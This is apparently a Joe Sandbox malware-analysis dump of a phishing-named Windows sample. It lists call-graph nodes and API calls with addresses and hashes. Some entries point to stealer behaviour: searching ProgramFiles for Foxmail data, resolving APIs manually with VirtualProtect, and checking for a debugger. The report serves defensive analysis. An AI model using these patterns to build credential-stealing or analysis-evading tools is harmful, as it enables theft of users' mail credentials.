6915->6918 6919 341d9cc4 6916->6919 6920 341d9cb0 6916->6920 6918->6912 6976 341d6332 6919->6976 6921 341d6368 __dosmaperr 20 API calls 6920->6921 6923 341d9cb5 6921->6923 6924 341d6355 __dosmaperr 20 API calls 6923->6924 6924->6912 7033 341d8c9e RtlLeaveCriticalSection 6925->7033 6927 341d9aea 6927->6856 6981 341d9f8d 6928->6981 7003 341d8dbc 6931->7003 6933 341d96c2 6934 341d96c7 6933->6934 6935 341d5af6 _abort 38 API calls 6933->6935 6934->6895 6934->6896 6936 341d96ea 6935->6936 6936->6934 6937 341d9708 GetConsoleMode 6936->6937 6937->6934 6939 341d969f 6938->6939 6942 341d966a 6938->6942 6939->6907 6940 341da181 WriteConsoleW CreateFileW 6940->6942 6941 341d96a1 GetLastError 6941->6939 6942->6939 6942->6940 6942->6941 6944 341d9607 6943->6944 6948 341d94f5 6943->6948 6945 341d2ada _ValidateLocalCookies 5 API calls 6944->6945 6946 341d9641 6945->6946 6946->6907 6948->6944 6949 341d957b WideCharToMultiByte 6948->6949 6950 341d79e6 40 API calls __fassign 6948->6950 6953 341d95d2 WriteFile 6948->6953 7012 341d7c19 6948->7012 6949->6944 6951 341d95a1 WriteFile 6949->6951 6950->6948 6951->6948 6952 341d962a GetLastError 6951->6952 6952->6944 6953->6948 6953->6952 6959 341d9816 6954->6959 6955 341d98d8 6956 341d2ada _ValidateLocalCookies 5 API calls 6955->6956 6958 341d98f1 6956->6958 6957 341d9894 WriteFile 6957->6959 6960 341d98da GetLastError 6957->6960 6958->6907 6959->6955 6959->6957 6960->6955 6968 341d9904 6961->6968 6962 341d9a0f 6963 341d2ada _ValidateLocalCookies 5 API calls 6962->6963 6964 341d9a1e 6963->6964 6964->6907 6965 341d9986 WideCharToMultiByte 6966 341d99bb WriteFile 6965->6966 6967 341d9a07 GetLastError 6965->6967 6966->6967 6966->6968 6967->6962 6968->6962 6968->6965 6968->6966 6974 341d9737 6969->6974 6970 341d97ea 6972 341d2ada _ValidateLocalCookies 5 API calls 6970->6972 6971 341d97a9 WriteFile 6971->6974 6975 341d97ec GetLastError 6971->6975 6973 341d9803 6972->6973 6973->6907 6974->6970 6974->6971 6975->6970 6977 341d6355 __dosmaperr 20 API calls 6976->6977 6978 341d633d __dosmaperr 6977->6978 6979 341d6368 __dosmaperr 20 API calls 6978->6979 6980 341d6350 6979->6980 6980->6912 6990 341d8d52 6981->6990 6983 341d9f9f 6984 341d9fb8 SetFilePointerEx 6983->6984 6985 341d9fa7 6983->6985 6986 341d9fd0 GetLastError 6984->6986 6989 341d9fac 6984->6989 6987 341d6368 __dosmaperr 20 API calls 6985->6987 6988 341d6332 __dosmaperr 20 API calls 6986->6988 6987->6989 6988->6989 6989->6885 6991 341d8d5f 6990->6991 6992 341d8d74 6990->6992 6993 341d6355 __dosmaperr 20 API calls 6991->6993 6995 341d6355 __dosmaperr 20 API calls 6992->6995 6998 341d8d99 6992->6998 6994 341d8d64 6993->6994 6997 341d6368 __dosmaperr 20 API calls 6994->6997 6996 341d8da4 6995->6996 6999 341d6368 __dosmaperr 20 API calls 6996->6999 7001 341d8d6c 6997->7001 6998->6983 7000 341d8dac 6999->7000 7002 341d62ac ___std_exception_copy 26 API calls 7000->7002 7001->6983 7002->7001 7004 341d8dc9 7003->7004 7005 341d8dd6 7003->7005 7006 341d6368 __dosmaperr 20 API calls 7004->7006 7007 341d6368 __dosmaperr 20 API calls 7005->7007 7008 341d8de2 7005->7008 7010 341d8dce 7006->7010 7009 341d8e03 7007->7009 7008->6933 7011 341d62ac ___std_exception_copy 26 API calls 7009->7011 7010->6933 7011->7010 7013 341d5af6 _abort 38 API calls 7012->7013 7014 341d7c24 7013->7014 7017 341d7a00 7014->7017 7018 341d7a28 7017->7018 7019 341d7a13 7017->7019 7018->6948 7019->7018 7021 341d7f0f 7019->7021 7022 341d7f1b ___scrt_is_nonwritable_in_current_image 7021->7022 7023 341d5af6 _abort 38 API calls 7022->7023 7024 341d7f24 7023->7024 7025 341d7f72 _abort 7024->7025 7026 341d5671 _abort RtlEnterCriticalSection 7024->7026 7025->7018 7027 341d7f42 7026->7027 7028 341d7f86 __fassign 20 API calls 7027->7028 7029 341d7f56 7028->7029 7030 341d7f75 __fassign RtlLeaveCriticalSection 7029->7030 7031 341d7f69 7030->7031 7031->7025 7032 341d55a8 _abort 38 API calls 7031->7032 7032->7025 7033->6927 7037 341dad24 7034->7037 7036 341dadca 7036->6842 7038 341dad30 ___scrt_is_nonwritable_in_current_image 7037->7038 7048 341d8c7b RtlEnterCriticalSection 7038->7048 7040 341dad3e 7041 341dad65 7040->7041 7042 341dad70 7040->7042 7049 341dae4d 7041->7049 7044 341d6368 __dosmaperr 20 API calls 7042->7044 7045 341dad6b 7044->7045 7064 341dad9a 7045->7064 7047 341dad8d _abort 7047->7036 7048->7040 7050 341d8d52 26 API calls 7049->7050 7051 341dae5d 7050->7051 7052 341dae63 7051->7052 7053 341dae95 7051->7053 7055 341d8d52 26 API calls 7051->7055 7067 341d8cc1 7052->7067 7053->7052 7056 341d8d52 26 API calls 7053->7056 7058 341dae8c 7055->7058 7059 341daea1 CloseHandle 7056->7059 7062 341d8d52 26 API calls 7058->7062 7059->7052 7063 341daead GetLastError 7059->7063 7060 341daedd 7060->7045 7061 341d6332 __dosmaperr 20 API calls 7061->7060 7062->7053 7063->7052 7076 341d8c9e RtlLeaveCriticalSection 7064->7076 7066 341dada4 7066->7047 7068 341d8d37 7067->7068 7069 341d8cd0 7067->7069 7070 341d6368 __dosmaperr 20 API calls 7068->7070 7069->7068 7073 341d8cfa 7069->7073 7071 341d8d3c 7070->7071 7072 341d6355 __dosmaperr 20 API calls 7071->7072 7074 341d8d27 7072->7074 7073->7074 7075 341d8d21 SetStdHandle 7073->7075 7074->7060 7074->7061 7075->7074 7076->7066 7077->6816 7078->6796 7079 341da945 7081 341da96d 7079->7081 7080 341da9a5 7081->7080 7082 341da99e 7081->7082 7083 341da997 7081->7083 7092 341daa00 7082->7092 7088 341daa17 7083->7088 7089 341daa20 7088->7089 7096 341db19b 7089->7096 7093 341daa20 7092->7093 7094 341db19b __startOneArgErrorHandling 21 API calls 7093->7094 7095 341da9a3 7094->7095 7097 341db1da __startOneArgErrorHandling 7096->7097 7102 341db25c __startOneArgErrorHandling 7097->7102 7106 341db59e 7097->7106 7099 341db286 7101 341db292 7099->7101 7113 341db8b2 7099->7113 7104 341d2ada _ValidateLocalCookies 5 API calls 7101->7104 7102->7099 7109 341d78a3 7102->7109 7105 341da99c 7104->7105 7120 341db5c1 7106->7120 7110 341d78cb 7109->7110 7111 341d2ada _ValidateLocalCookies 5 API calls 7110->7111 7112 341d78e8 7111->7112 7112->7099 7114 341db8bf 7113->7114 7115 341db8d4 7113->7115 7117 341db8d9 7114->7117 7118 341d6368 __dosmaperr 20 API calls 7114->7118 7116 341d6368 __dosmaperr 20 API calls 7115->7116 7116->7117 7117->7101 7119 341db8cc 7118->7119 7119->7101 7121 341db5ec __raise_exc 7120->7121 7122 341db7e5 RaiseException 7121->7122 7123 341db5bc 7122->7123 7123->7102 7827 341d7bc7 7828 341d7bd3 ___scrt_is_nonwritable_in_current_image 7827->7828 7830 341d7c0a _abort 7828->7830 7835 341d5671 RtlEnterCriticalSection 7828->7835 7831 341d7be7 7836 341d7f86 7831->7836 7835->7831 7837 341d7bf7 7836->7837 7838 341d7f94 __fassign 7836->7838 7840 341d7c10 7837->7840 7838->7837 7839 341d7cc2 __fassign 20 API calls 7838->7839 7839->7837 7843 341d56b9 RtlLeaveCriticalSection 7840->7843 7842 341d7c17 7842->7830 7843->7842 7844 341da1c6 IsProcessorFeaturePresent 7124 341d8640 7127 341d8657 7124->7127 7128 341d8679 7127->7128 7129 341d8665 7127->7129 7130 341d8681 7128->7130 7131 341d8693 7128->7131 7132 341d6368 __dosmaperr 20 API calls 7129->7132 7134 341d6368 __dosmaperr 20 API calls 7130->7134 7139 341d8652 7131->7139 7140 341d54a7 7131->7140 7133 341d866a 7132->7133 7135 341d62ac ___std_exception_copy 26 API calls 7133->7135 7136 341d8686 7134->7136 7135->7139 7138 341d62ac ___std_exception_copy 26 API calls 7136->7138 7138->7139 7141 341d54c4 7140->7141 7142 341d54ba 7140->7142 7141->7142 7143 341d5af6 _abort 38 API calls 7141->7143 7142->7139 7144 341d54e5 7143->7144 7145 341d7a00 __fassign 38 API calls 7144->7145 7146 341d54fe 7145->7146 7148 341d7a2d 7146->7148 7149 341d7a40 7148->7149 7151 341d7a55 7148->7151 7149->7151 7152 341d6d7e 7149->7152 7151->7142 7153 341d6d8a ___scrt_is_nonwritable_in_current_image 7152->7153 7154 341d5af6 _abort 38 API calls 7153->7154 7159 341d6d94 7154->7159 7156 341d6e18 _abort 7156->7151 7158 341d55a8 _abort 38 API calls 7158->7159 7159->7156 7159->7158 7160 341d571e _free 20 API calls 7159->7160 7161 341d5671 RtlEnterCriticalSection 7159->7161 7162 341d6e0f 7159->7162 7160->7159 7161->7159 7165 341d56b9 RtlLeaveCriticalSection 7162->7165 7164 341d6e16 7164->7159 7165->7164 7166 341daf43 7167 341daf4d 7166->7167 7168 341daf59 7166->7168 7167->7168 7169 341daf52 CloseHandle 7167->7169 7169->7168 7845 341d5bff 7853 341d5d5c 7845->7853 7848 341d5c13 7849 341d5b7a _abort 20 API calls 7850 341d5c1b 7849->7850 7851 341d5c28 7850->7851 7852 341d5c2b 11 API calls 7850->7852 7852->7848 7854 341d5c45 _abort 5 API calls 7853->7854 7855 341d5d83 7854->7855 7856 341d5d9b TlsAlloc 7855->7856 7859 341d5d8c 7855->7859 7856->7859 7857 341d2ada _ValidateLocalCookies 5 API calls 7858 341d5c09 7857->7858 7858->7848 7858->7849 7859->7857 7170 341d9e71 7171 341d9e95 7170->7171 7172 341d9ee6 7171->7172 7174 341d9f71 __startOneArgErrorHandling 7171->7174 7175 341d9ef8 7172->7175 7178 341daa53 7172->7178 7177 341dacad __startOneArgErrorHandling 7174->7177 7188 341db2f0 7174->7188 7179 341daa70 RtlDecodePointer 7178->7179 7181 341daa80 7178->7181 7179->7181 7180 341dab0d 7184 341dab02 7180->7184 7186 341d6368 __dosmaperr 20 API calls 7180->7186 7181->7180 7181->7184 7185 341daab7 7181->7185 7182 341d2ada _ValidateLocalCookies 5 API calls 7183 341dac67 7182->7183 7183->7175 7184->7182 7185->7184 7187 341d6368 __dosmaperr 20 API calls 7185->7187 7186->7184 7187->7184 7189 341db329 __startOneArgErrorHandling 7188->7189 7190 341db5c1 __raise_exc RaiseException 7189->7190 7191 341db350 __startOneArgErrorHandling 7189->7191 7190->7191 7192 341db393 7191->7192 7194 341db36e 7191->7194 7193 341db8b2 __startOneArgErrorHandling 20 API calls 7192->7193 7196 341db38e __startOneArgErrorHandling 7193->7196 7199 341db8e1 7194->7199 7197 341d2ada _ValidateLocalCookies 5 API calls 7196->7197 7198 341db3b7 7197->7198 7198->7177 7200 341db8f0 7199->7200 7201 341db90f __startOneArgErrorHandling 7200->7201 7202 341db964 __startOneArgErrorHandling 7200->7202 7203 341d78a3 __startOneArgErrorHandling 5 API calls 7201->7203 7204 341db8b2 __startOneArgErrorHandling 20 API calls 7202->7204 7205 341db950 7203->7205 7207 341db95d 7204->7207 7206 341db8b2 __startOneArgErrorHandling 20 API calls 7205->7206 7205->7207 7206->7207 7207->7196 7208 341d3370 7219 341d3330 7208->7219 7220 341d334f 7219->7220 7221 341d3342 7219->7221 7222 341d2ada _ValidateLocalCookies 5 API calls 7221->7222 7222->7220 7860 341d63f0 7861 341d6416 7860->7861 7862 341d6400 7860->7862 7870 341d6561 7861->7870 7873 341d6480 7861->7873 7879 341d6580 7861->7879 7863 341d6368 __dosmaperr 20 API calls 7862->7863 7864 341d6405 7863->7864 7865 341d62ac ___std_exception_copy 26 API calls 7864->7865 7874 341d640f 7865->7874 7866 341d4e76 20 API calls 7871 341d64e5 7866->7871 7868 341d64ee 7869 341d571e _free 20 API calls 7868->7869 7869->7870 7899 341d679a 7870->7899 7871->7868 7871->7871 7876 341d6573 7871->7876 7890 341d85eb 7871->7890 7873->7866 7877 341d62bc ___std_exception_copy 11 API calls 7876->7877 7878 341d657f 7877->7878 7880 341d658c 7879->7880 7880->7880 7881 341d637b _abort 20 API calls 7880->7881 7882 341d65ba 7881->7882 7883 341d85eb 26 API calls 7882->7883 7884 341d65e6 7883->7884 7885 341d62bc ___std_exception_copy 11 API calls 7884->7885 7886 341d6615 ___scrt_fastfail 7885->7886 7887 341d66b6 FindFirstFileExA 7886->7887 7888 341d6705 7887->7888 7889 341d6580 26 API calls 7888->7889 7891 341d853a 7890->7891 7892 341d854f 7891->7892 7893 341d8554 7891->7893 7897 341d858b 7891->7897 7892->7893 7894 341d6368 __dosmaperr 20 API calls 7892->7894 7893->7871 7895 341d857a 7894->7895 7896 341d62ac ___std_exception_copy 26 API calls 7895->7896 7896->7893 7897->7893 7898 341d6368 __dosmaperr 20 API calls 7897->7898 7898->7895 7900 341d67a4 7899->7900 7901 341d67b4 7900->7901 7902 341d571e _free 20 API calls 7900->7902 7903 341d571e _free 20 API calls 7901->7903 7902->7900 7904 341d67bb 7903->7904 7904->7874 7223 341d506f 7224 341d5087 7223->7224 7225 341d5081 7223->7225 7226 341d5000 20 API calls 7225->7226 7226->7224 7227 341dac6b 7228 341dac84 __startOneArgErrorHandling 7227->7228 7229 341dacad __startOneArgErrorHandling 7228->7229 7230 341db2f0 21 API calls 7228->7230 7230->7229 7905 405bb8 lstrlenW 7906 405bc6 7905->7906 7907 405bd8 7906->7907 7908 405bcc CharPrevW 7906->7908 7908->7906 7908->7907 7231 341d9d61 7232 341d9d81 7231->7232 7235 341d9db8 7232->7235 7234 341d9dab 7237 341d9dbf 7235->7237 7236 341d9e20 7239 341daa17 21 API calls 7236->7239 7240 341da90e 7236->7240 7237->7236 7238 341d9ddf 7237->7238 7238->7240 7242 341daa17 21 API calls 7238->7242 7241 341d9e6e 7239->7241 7240->7234 7241->7234 7243 341da93e 7242->7243 7243->7234 7244 341d7260 GetStartupInfoW 7245 341d7318 7244->7245 7246 341d7286 7244->7246 7246->7245 7250 341d8be3 7246->7250 7248 341d72af 7248->7245 7249 341d72dd GetFileType 7248->7249 7249->7248 7251 341d8bef ___scrt_is_nonwritable_in_current_image 7250->7251 7252 341d8bfc 7251->7252 7253 341d8c13 7251->7253 7254 341d6368 __dosmaperr 20 API calls 7252->7254 7263 341d5671 RtlEnterCriticalSection 7253->7263 7256 341d8c01 7254->7256 7257 341d62ac ___std_exception_copy 26 API calls 7256->7257 7260 341d8c0b _abort 7257->7260 7258 341d8c1f 7262 341d8c4b 7258->7262 7264 341d8b34 7258->7264 7260->7248 7271 341d8c72 7262->7271 7263->7258 7265 341d637b _abort 20 API calls 7264->7265 7268 341d8b46 7265->7268 7266 341d8b53 7267 341d571e _free 20 API calls 7266->7267 7269 341d8ba5 7267->7269 7268->7266 7270 341d5eb7 11 API calls 7268->7270 7269->7258 7270->7268 7274 341d56b9 RtlLeaveCriticalSection 7271->7274 7273 341d8c79 7273->7260 7274->7273 7909 341da1e0 7912 341da1fe 7909->7912 7911 341da1f6 7913 341da203 7912->7913 7914 341daa53 21 API calls 7913->7914 7916 341da298 7913->7916 7915 341da42f 7914->7915 7915->7911 7916->7911

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 341D1137
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 341D1151
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D115C
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D116D
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D117C
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 341D1193
                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 341D11D0
                                                                                • FindClose.KERNEL32(00000000), ref: 341D11DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                • String ID:
                                                                                • API String ID: 1083526818-0
                                                                                • Opcode ID: 2e5d21a4d3fdcb014ad817dd7008858566c571fcd2a3cf511d958c900b58ea06
                                                                                • Instruction ID: 0e900c4d653c95aba5cd13fec230e32ce2e33aa0c0795795a2b0d15e83ed5194
                                                                                • Opcode Fuzzy Hash: 2e5d21a4d3fdcb014ad817dd7008858566c571fcd2a3cf511d958c900b58ea06
                                                                                • Instruction Fuzzy Hash: 8A21B4B2944718ABD720EA75DC88FABBBDCEF85314F000D2AF958D3190EB70D6158796

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 341D1434
                                                                                  • Part of subcall function 341D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 341D1137
                                                                                  • Part of subcall function 341D10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 341D1151
                                                                                  • Part of subcall function 341D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D115C
                                                                                  • Part of subcall function 341D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D116D
                                                                                  • Part of subcall function 341D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 341D117C
                                                                                  • Part of subcall function 341D10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 341D1193
                                                                                  • Part of subcall function 341D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 341D11D0
                                                                                  • Part of subcall function 341D10F1: FindClose.KERNEL32(00000000), ref: 341D11DB
                                                                                • lstrlenW.KERNEL32(?), ref: 341D14C5
                                                                                • lstrlenW.KERNEL32(?), ref: 341D14E0
                                                                                • lstrlenW.KERNEL32(?,?), ref: 341D150F
                                                                                • lstrcatW.KERNEL32(00000000), ref: 341D1521
                                                                                • lstrlenW.KERNEL32(?,?), ref: 341D1547
                                                                                • lstrcatW.KERNEL32(00000000), ref: 341D1553
                                                                                • lstrlenW.KERNEL32(?,?), ref: 341D1579
                                                                                • lstrcatW.KERNEL32(00000000), ref: 341D1585
                                                                                • lstrlenW.KERNEL32(?,?), ref: 341D15AB
                                                                                • lstrcatW.KERNEL32(00000000), ref: 341D15B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                • API String ID: 672098462-2938083778
                                                                                • Opcode ID: 8f9eb60ceb9e715bc0517339b8589b6f8561c51d329d5a2f88ccf6045c355870
                                                                                • Instruction ID: 86751bed9a01516993db3fd3bdcf93a79e475fdf7259d6a90f4fd72b26b57f6d
                                                                                • Opcode Fuzzy Hash: 8f9eb60ceb9e715bc0517339b8589b6f8561c51d329d5a2f88ccf6045c355870
                                                                                • Instruction Fuzzy Hash: D481C4B5A00768AAEB20D7A0DC85FEEB37DEF85700F000596F509E7190EA715AC5CF99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(341DC7DD), ref: 341DC7E6
                                                                                • GetModuleHandleA.KERNEL32(?,341DC7DD), ref: 341DC838
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 341DC860
                                                                                  • Part of subcall function 341DC803: GetProcAddress.KERNEL32(00000000,341DC7F4), ref: 341DC804
                                                                                  • Part of subcall function 341DC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC816
                                                                                  • Part of subcall function 341DC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC82A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2099061454-0
                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction ID: 9639bbed3886ae265a4588bb4d4278020cfa42ea861390480a2dc96aee7ade8c
                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction Fuzzy Hash: 5E01D6D49C5FD1BCBB1156744CC1DFA9F999B276A0B101FFAE040C6193FEA08506C3A5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 79 341dc7a7-341dc7bc 80 341dc82d 79->80 81 341dc7be-341dc7c6 79->81 82 341dc82f-341dc833 80->82 81->80 83 341dc7c8-341dc7f6 call 341dc7e6 81->83 84 341dc835-341dc83d GetModuleHandleA 82->84 85 341dc872 call 341dc877 82->85 90 341dc86c-341dc86e 83->90 91 341dc7f8 83->91 89 341dc83f-341dc847 84->89 89->89 92 341dc849-341dc84c 89->92 96 341dc866-341dc86b 90->96 97 341dc870 90->97 93 341dc85b-341dc85e 91->93 94 341dc7fa-341dc7fe 91->94 92->82 95 341dc84e-341dc850 92->95 101 341dc85f-341dc860 GetProcAddress 93->101 102 341dc865 94->102 103 341dc800-341dc80b GetProcAddress 94->103 99 341dc856-341dc85a 95->99 100 341dc852-341dc854 95->100 96->90 97->92 99->93 100->101 101->102 102->96 103->80 104 341dc80d-341dc81a VirtualProtect 103->104 105 341dc82c 104->105 106 341dc81c-341dc82a VirtualProtect 104->106 105->80 106->105
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,341DC7DD), ref: 341DC838
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 341DC860
                                                                                  • Part of subcall function 341DC7E6: GetModuleHandleA.KERNEL32(341DC7DD), ref: 341DC7E6
                                                                                  • Part of subcall function 341DC7E6: GetProcAddress.KERNEL32(00000000,341DC7F4), ref: 341DC804
                                                                                  • Part of subcall function 341DC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC816
                                                                                  • Part of subcall function 341DC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC82A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2099061454-0
                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction ID: 34c053b7e7a87fb79354347edad569fb5999f0aa8ccb68a5559dcb86f870ed5f
                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                • Instruction Fuzzy Hash: B821F9E55C9AC16FFB1147B44CC4EB56FD99B172A0F190EFAD040CB143F6A49445C3A5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 107 341dc803-341dc80b GetProcAddress 108 341dc82d 107->108 109 341dc80d-341dc81a VirtualProtect 107->109 112 341dc82f-341dc833 108->112 110 341dc82c 109->110 111 341dc81c-341dc82a VirtualProtect 109->111 110->108 111->110 113 341dc835-341dc83d GetModuleHandleA 112->113 114 341dc872 call 341dc877 112->114 116 341dc83f-341dc847 113->116 116->116 117 341dc849-341dc84c 116->117 117->112 118 341dc84e-341dc850 117->118 119 341dc856-341dc85e 118->119 120 341dc852-341dc854 118->120 121 341dc85f-341dc865 GetProcAddress 119->121 120->121 124 341dc866-341dc86e 121->124 126 341dc870 124->126 126->117
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,341DC7F4), ref: 341DC804
                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC816
                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,341DC7F4,341DC7DD), ref: 341DC82A
                                                                                • GetModuleHandleA.KERNEL32(?,341DC7DD), ref: 341DC838
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 341DC860
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 2152742572-0
                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction ID: b221c030d6702c3796dca2fe282bd4baa195bda57e2fa8896ea5bb1f9450cb29
                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                • Instruction Fuzzy Hash: 90F0AFD5AC9FC07CFA1145B40CC1EF69F8D8B276A0B101EBAE100C7182FAA5850683F6
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 341D61DA
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 341D61E4
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 341D61F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: fb6eeb4a4bb5e41f476898b4ce3cb214d1157632342eaf1f2436d17b0c8011e1
                                                                                • Instruction ID: 414d6bf67ea1063ad015d9f0ec3dbae666ce8cacca807389ae6b79766fb2fcac
                                                                                • Opcode Fuzzy Hash: fb6eeb4a4bb5e41f476898b4ce3cb214d1157632342eaf1f2436d17b0c8011e1
                                                                                • Instruction Fuzzy Hash: AB31D4B491162CDBDB21DF64D98879DBBB8FF09310F5041DAE81CA7260E7309B928F45
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,341D4A8A,?,341E2238,0000000C,341D4BBD,00000000,00000000,00000001,341D2082,341E2108,0000000C,341D1F3A,?), ref: 341D4AD5
                                                                                • TerminateProcess.KERNEL32(00000000,?,341D4A8A,?,341E2238,0000000C,341D4BBD,00000000,00000000,00000001,341D2082,341E2108,0000000C,341D1F3A,?), ref: 341D4ADC
                                                                                • ExitProcess.KERNEL32 ref: 341D4AEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
